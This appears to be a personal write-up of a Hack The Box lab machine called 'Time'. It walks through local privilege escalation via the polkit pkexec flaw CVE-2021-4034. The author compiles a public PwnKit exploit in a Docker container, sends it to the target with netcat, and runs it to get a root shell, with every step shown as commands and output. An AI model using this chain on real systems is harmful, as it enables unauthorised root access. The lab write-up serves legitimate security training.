InfoSec LAB

Time_Privilege_Escalation_2

Created: 3 min read

CVE-2021-4034

peas discovered that the target system is vulnerable to cve-2021-4034

The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

exploit (pwnkit):

I found an exploit online

pericles@time:/$ gcc
 
Command 'gcc' not found, but can be installed with:
 
apt install gcc
Please ask your administrator.

The target system does have any compiler installed. I would need to compile the exploit remotely.

Docker Exploit Development

┌──(kali㉿kali)-[~/archive/htb/labs/time]
└─$ docker run -it --entrypoint "/bin/bash" --name timer ubuntu:20.04
root@5e6ac0a00f26:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git wget

Setting up the environment

root@5e6ac0a00f26:~# git clone https://github.com/berdav/CVE-2021-4034 ; cd CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
unpacking objects: 100% (92/92), 22.69 KiB | 968.00 KiB/s, done.

Downloading the exploit

root@5e6ac0a00f26:~/CVE-2021-4034# make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true gconv_path=./pwnkit.so:.

Compile

Exploit

root@5e6ac0a00f26:~/CVE-2021-4034# cd ../ ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
root@5e6ac0a00f26:~# nc 10.10.10.214 2222 < CVE-2021-4034.tar.gz
 
pericles@time:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on 0.0.0.0 2222
Connection received on 10.10.14.7 35768
pericles@time:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Packaging & delivery complete

pericles@time:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
time
# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.214  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:759a  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:759a  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:75:9a  txqueuelen 1000  (Ethernet)
        RX packets 144892  bytes 17846918 (17.8 MB)
        RX errors 0  dropped 26  overruns 0  frame 0
        TX packets 140110  bytes 10993435 (10.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 33286  bytes 2364926 (2.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 33286  bytes 2364926 (2.3 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks